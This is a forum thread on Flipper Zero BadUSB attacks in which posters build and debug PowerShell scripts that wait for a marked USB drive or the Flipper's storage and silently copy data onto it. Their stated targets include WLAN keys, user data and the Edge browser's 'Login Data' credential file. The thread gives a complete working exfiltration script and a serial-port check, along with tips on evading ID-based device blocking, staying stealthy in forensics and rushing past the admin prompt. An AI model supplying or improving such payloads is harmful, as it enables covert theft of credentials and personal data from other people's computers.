Any way to save files back to the Flipper using BadUSB?

I’ve tried today on a test system.

  1. The encoding doesn't work in my region. I suggest replacing STRING with ALTSTRING.
  2. But even if the encoding is fixed, the Test-Path never gets a $true.

I vaguely remember there was an issue with Test-Path and removable devices, but I cannot remember the details.

My debugging code so far:

$CopyFrom = "C:\Windows\System32\calc.exe"; $CopyTo = "copy"
$FindMe = "gfhnubkw.txt"; $f = $false
While (-not $f) {
    # DriveType=2 is "removable"; Name is the mounted root path, e.g. E:\
    Foreach ($USBDrive in (Get-WmiObject -Class Win32_Volume -Filter "DriveType=2").Name) {
        If (Test-Path (Join-Path -Path $USBDrive -ChildPath $FindMe)) {
            $f = $true
            Write-Host "Copying... $(((Get-ChildItem $CopyFrom | Measure-Object -Sum Length).Sum)/1MB) MB to $USBDrive, where $(((Get-Volume -DriveLetter $USBDrive.Substring(0,1)).SizeRemaining)/1MB) MB are remaining"
            Copy-Item -Path $CopyFrom -Destination (Join-Path -Path $USBDrive -ChildPath $CopyTo) -Recurse -ErrorAction SilentlyContinue
            # Exit   # uncomment to stop right after the copy
        }
    }
}

Is my Win10 (up to date) the only one which does not work?
(Join-Path -Path $USBDrive -ChildPath $FindMe) gives the correct result, but the If is always $false. If I perform this on a hard drive by changing the variables, it works.

Also with Test-Path instead of [System.IO.File]::Exists(); I just played with other known functions.

Edit: Make Code more compact.


Okay, this is somewhat embarrassing … It is a fresh Windows, so the file extensions were hidden. The script can't find gfhnubkw.txt.txt

It works.

I was more interested in WLAN keys and user data. Even “%localappdata%\Microsoft\Edge\User Data\Default\Login Data” is only a few kb in size.

But it seems that ‘large data exfiltration’ is a point of interest.
In your example, @Zarcolio, you're selecting C:\Windows\ and copying this to a USB drive. My fresh C:\Windows\ is nearly 30GB … my test USB drive 8GB.

I extended the Write-Host Line:
Write-Host "Copying... $(((Get-ChildItem $CopyFrom | Measure-Object -Sum Length).Sum)/1MB) MB to $e, where $(((Get-Volume -DriveLetter $e).SizeRemaining)/1MB) MB are remaining"
Maybe it is useful to check if the remaining space is enough.

In my tests I wanted to copy a file. The Copy-Item cmdlet writes calc.exe to E:\copy … Maybe some New-Item -ItemType Directory -Force -Path $e\$copy (short: md $e\$copy) would help?
No time to test today. I would not have answered if my previous post wasn't so wrong.


Been a really long day, no access to personal device today.
Will try tomorrow to have a look.
Maybe better to use ALTSTRING always if some regions have difficulties with STRING.
Will have a look at your code :ok_hand:

No worries, stuff happens :wink:

C:\Windows was only a test to check if it starts.
You can change to whatever you like.

Will have a look tomorrow, hopefully :sweat_smile:

I understand, you'd want to have a look at it first. But the file-to-$CopyTo issue bugs me.
I've added If (Test-Path -Path $CopyFrom -PathType Leaf) {md $USBDrive\$CopyTo} before the Copy-Item cmdlet. Otherwise C:\Windows\* would be copied to E:\copy\* (let's say renamed at the target) … this is okay for me.
md is very short for New-Object -Blah Directory blah blah blah. Standard PS function, so I use it.

Why would you make this script run (slightly) longer when you can prepare the USB drive before using it? :wink:

Good point. If the script won’t check for the file, instead for the path, it would be 2 in one.

Changed the script a bit:

  • It uses ALTSTRING
  • It quits after $MaxDuration
  • It shows total MB/GB to be copied

Thanks for the input :smile:

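The pieces discussed across the posts above (waiting for a removable drive that carries the marker file, checking that the remaining space is enough, creating the destination directory so a single file is not written as a file literally named "copy", and quitting after $MaxDuration) combined into one script. This is an added example, not any poster's actual script; the defaults, parameter names and the 2-second poll interval are assumptions.

```powershell
# Added example, not any poster's script: wait for a removable drive that carries
# the marker file, check free space, create the destination directory, copy, and
# give up after $MaxDuration seconds. Defaults and parameter names are assumptions.
param(
    [string]$CopyFrom    = 'C:\Windows\System32\calc.exe',
    [string]$CopyTo      = 'copy',
    [string]$MarkerFile  = 'gfhnubkw.txt',
    [int]   $MaxDuration = 120
)

function Get-RemovableRoots {
    # DriveType 2 = removable; Name is the mounted root, e.g. "E:\"
    Get-CimInstance -ClassName Win32_Volume -Filter 'DriveType=2' |
        Where-Object { $_.DriveLetter } |
        Select-Object -ExpandProperty Name
}

function Find-MarkedDrive {
    param([string]$Marker)
    foreach ($root in Get-RemovableRoots) {
        # -PathType Leaf: the marker must be a file (a folder of the same name does not count)
        if (Test-Path -LiteralPath (Join-Path $root $Marker) -PathType Leaf) { return $root }
    }
    return $null
}

function Get-SourceSize {
    param([string]$Path)
    # Works for a single file and for a directory tree
    $sum = (Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
            Measure-Object -Property Length -Sum).Sum
    if ($null -eq $sum) { return 0 }
    return [long]$sum
}

function Format-Size {
    param([long]$Bytes)
    if ($Bytes -ge 1GB) { return ('{0:N2} GB' -f ($Bytes / 1GB)) }
    return ('{0:N1} MB' -f ($Bytes / 1MB))
}

$deadline = (Get-Date).AddSeconds($MaxDuration)
$target   = $null
while (-not $target -and (Get-Date) -lt $deadline) {
    $target = Find-MarkedDrive -Marker $MarkerFile
    if (-not $target) { Start-Sleep -Seconds 2 }
}
if (-not $target) {
    Write-Host "No removable drive with $MarkerFile within $MaxDuration s, quitting"
    exit 1
}

$needed = Get-SourceSize -Path $CopyFrom
$free   = (Get-PSDrive -Name $target.Substring(0, 1)).Free
if ($needed -gt $free) {
    Write-Host "Need $(Format-Size $needed) but only $(Format-Size $free) free on $target, quitting"
    exit 2
}

# Create the destination directory first; otherwise a single-file source is written
# as a file literally named "copy" instead of into a folder of that name.
$dest = Join-Path $target $CopyTo
New-Item -ItemType Directory -Path $dest -Force | Out-Null

Write-Host "Copying $(Format-Size $needed) to $dest ($(Format-Size $free) free)"
# A directory source ends up as a subfolder of $dest; pass "$CopyFrom\*" to copy only its contents
Copy-Item -LiteralPath $CopyFrom -Destination $dest -Recurse -Force -ErrorAction SilentlyContinue
```

Run it as a file (.\exfil-test.ps1 -CopyFrom 'C:\Users\Public' -MaxDuration 60) so the param block applies; the free-space check is done before anything is written, which is the point raised above about a 30GB source and an 8GB stick.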

I know it's been a little while since this topic was active, but looking into it now this seems like a super promising method to get some kind of exfiltration via storage functionality. I want to test this script once I'm home and have access to the Flipper, but I'm wondering whether I would need to change the -match 'HID/USB' values, if not all Flippers have the same IDs. If they do, how would I find mine? Still relatively new to PowerShell hahaha, not quite accustomed to how things are done on Windows.


Changing the ID is a feature of BadUSB, so it is set at the beginning of the BadUSB file.
Since the PowerShell is searching for the ID, it needs to be changed there too.

But if you are new to this, it is really not important to understand the basics. Just start with it 'as is'.
If you choose the wrong ID, Windows will try to install a driver and map the Flipper's BadUSB… It is only necessary as an attack vector if:
A. You know the computer/network has an ID-based blocking rule.
B. You want to stay stealthy in later forensic analysis … But then you should know what IDs are used in this environment.

Great, thank you. I've attempted to test the script (both your version here and emptythevoid's version on GitHub) and can't seem to get any success. It runs the PowerShell code just fine and will return 'BadUSB' when I'm still in BadUSB mode, but when exiting out to the list of apps it just displays 'NoFZ' and nothing is written. I haven't changed any IDs in the BadUSB script, and as far as Windows is telling me the COM device has the same VID and PID as is in the script. Is there any reason you can think of as to why it might not work? I have a custom firmware installed but it hasn't affected qFlipper's serial connection nor any kind of BadUSB connectivity.

The script cannot work if qFlipper, the web client or another app gets the COM port first and blocks it.
There is no special debug output for this situation, but NoFZ sounds reasonable.

To check close all apps (mainly qFlipper and Browser).


Ahh yes that makes sense, that was the issue. It seems to work well now, my only concern is the amount of time it takes to write out the one-liner, might look into some way I can speed it up. Thanks very much for your help, always wanted a way to locally exfiltrate data :slight_smile:

Good to hear it worked.

I already tried to speed up the process, but getting the input faster led to wrong inputs (repeated or missing characters). So in the end reliable input was more important for me.

But if you get it faster, we all would be interested in the results :slight_smile:

Btw: If I remember right, the result is the same, but what I wrote was not very accurate.
If a client like qFlipper acquires the Flipper, it does not block the port; the Flipper switches into another mode. So maybe the VID/PID is there and the port is open but can't be used … This can be important when writing checks or debugging.
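A check that tells the three situations described in the last few posts apart (no device with that VID/PID at all, port already held by another client, port open but the Flipper not answering because a client has claimed it). This is an added example and not the thread's script; the default VID/PID values, the baud rate and the newline probe are assumptions, so set the IDs to what Device Manager shows for your COM device.

```powershell
# Added example, not code from the thread: find the Flipper's CDC serial port by USB
# VID/PID, then open and probe it, so three cases are reported distinctly: no such
# device, port held by another client, and port open but not answering.
# The VID/PID defaults and the baud rate are assumptions; use what Device Manager shows.
param(
    [string]$VendorId  = '0483',
    [string]$ProductId = '5740',
    [int]   $Baud      = 115200
)

function Find-SerialPortByUsbId {
    param([string]$VendorId, [string]$ProductId)
    # USB serial devices carry a PnP ID like USB\VID_0483&PID_5740\<serial> and a
    # friendly name ending in "(COMn)"
    $idPattern = [regex]::Escape("VID_$VendorId&PID_$ProductId")
    Get-CimInstance -ClassName Win32_PnPEntity |
        Where-Object { $_.PNPDeviceID -match $idPattern } |
        ForEach-Object { if ($_.Name -match '\((COM\d+)\)') { $Matches[1] } } |
        Select-Object -First 1
}

function Test-SerialPort {
    param([string]$PortName, [int]$Baud)
    $port = New-Object System.IO.Ports.SerialPort
    $port.PortName    = $PortName
    $port.BaudRate    = $Baud
    $port.ReadTimeout = 1000
    try {
        $port.Open()
        # Send a bare newline and see whether anything at all comes back
        $port.Write("`r`n")
        Start-Sleep -Milliseconds 500
        $reply = $port.ReadExisting()
        if ($reply) { return 'open, responding' }
        return 'open, but silent (device may be claimed by another client)'
    } catch [System.UnauthorizedAccessException] {
        # Open() fails this way when another process (qFlipper, the web client) owns the port
        return 'busy (port held by another process)'
    } catch {
        return "error: $($_.Exception.Message)"
    } finally {
        if ($port.IsOpen) { $port.Close() }
    }
}

$com = Find-SerialPortByUsbId -VendorId $VendorId -ProductId $ProductId
if (-not $com) {
    Write-Host "No serial device with VID_$VendorId&PID_$ProductId found"
    exit 1
}
Write-Host "$com : $(Test-SerialPort -PortName $com -Baud $Baud)"
```

Running this with qFlipper open and then again after closing it shows the difference directly; the "open, but silent" outcome is the case mentioned above where the VID/PID is present and the port opens but cannot be used.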

I managed to get it slightly faster by removing all delays except for accepting the “making changes to your computer” dialogue. I’m not sure if it’s the case with every device but my PowerShell seems to accept input for new commands even as previous commands are running, which means I’m able to exit BadUSB mode way before the target computer even gets to running the loop checking for serial connection.


Partitioning the storage prior?

I know this is a little old and my knowledge of the subject is limited, but I noticed the baud rate in the script is set to 115200, while the Flipper CLI docs suggest using a baud rate of 230400. I'm not sure if this has any impact, but it's an adjustment I made in my script.
